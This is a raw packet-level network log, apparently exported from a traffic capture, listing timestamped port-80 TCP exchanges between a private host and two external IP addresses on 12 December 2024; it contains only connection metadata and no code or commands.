                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.774177074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.774189949 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.774208069 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.774256945 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.774267912 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.774637938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.774748087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.774832010 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.775582075 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.775618076 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.775648117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.775659084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.775686979 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.775710106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.775789976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.776673079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.777065992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.777071953 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.777084112 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.777143955 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.777152061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.777177095 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.777723074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.778137922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.778217077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.778491974 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.778502941 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.778533936 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.778726101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.778884888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.778959990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.779748917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.779825926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.779830933 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.779907942 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.779915094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.779928923 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.779963970 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.780746937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.780765057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.780864954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.781349897 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.781363010 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.781392097 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.781402111 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.781840086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.781852961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.781934977 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.782746077 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.782783985 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.783160925 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.783174038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.783185959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.783199072 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.783276081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.783922911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.784003973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.784090042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.784219027 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.784230947 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.784261942 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.784276009 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.784796000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.784881115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.784960032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.785445929 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.785487890 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.785608053 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.785650015 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.785919905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.785929918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.786019087 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.786886930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.786932945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.786945105 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.787004948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.787009954 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.787015915 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.787053108 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.787873030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.787988901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.788075924 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.788300037 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.788337946 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.788907051 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.788918018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.788930893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.788944960 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.789026976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.789793968 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.789833069 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.789845943 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.789884090 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.789966106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.790113926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.790198088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.790941954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.791224957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.791240931 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.791248083 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.791306019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.791327000 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.791920900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.791939020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.792016983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.792480946 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.792524099 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.792712927 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.792757034 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.792947054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.793159008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.793239117 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.793920040 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.793961048 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.793976068 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.793987036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.794018984 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.794037104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.794111967 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.794986010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.795744896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.795825958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.796010971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.796111107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.796210051 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.797066927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.797069073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.797168016 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.798052073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.798434019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.798526049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.799093962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.799770117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.799849987 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.800031900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.801074028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.801090956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.801182985 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.801191092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.801295042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.802078009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.802092075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.802181005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.803052902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.803248882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.803344011 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.804131985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.805135965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.805149078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.805162907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.805222988 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.805264950 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.806174994 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.807233095 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.807245970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.807327986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.807327986 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.807367086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.808206081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.809235096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.809246063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.809274912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.809329987 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.809356928 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.810178041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.811028957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.811108112 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.811213970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.811224937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.811307907 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.812212944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.813282967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.813293934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.813361883 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.813380003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.813417912 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.814240932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.814615011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.814694881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.815321922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.815547943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.815635920 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.816293955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.817411900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.817424059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.817502975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.907020092 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.907068968 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.907164097 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.907207012 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.907511950 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.907517910 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.907529116 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.907553911 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.907577991 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.908835888 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.908873081 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.908992052 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.909029961 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.909842968 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.909885883 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.910171032 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.910211086 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.910849094 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.910887003 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.911021948 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.911062956 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.911866903 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.911910057 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.912048101 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.912086964 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.912425041 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.912436008 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.912462950 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.912488937 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.913274050 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.913309097 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.913563013 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.913594961 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.914254904 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.914335966 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.914577961 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.914624929 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.915258884 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.915298939 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.915441036 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.915482044 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.916238070 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.916286945 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.916416883 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.916460991 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.917212963 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.917263985 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.917290926 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.917327881 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.918191910 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.918225050 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.918307066 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.918344021 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.919203043 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.919239998 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.919346094 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.919384003 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.920142889 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.920190096 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.920600891 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.920641899 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.921144009 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.921185970 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.921444893 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.921494007 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.922172070 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.922214031 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.922853947 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.922898054 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.923089981 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.923130989 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.923161030 CET8049957185.215.113.16192.168.2.10
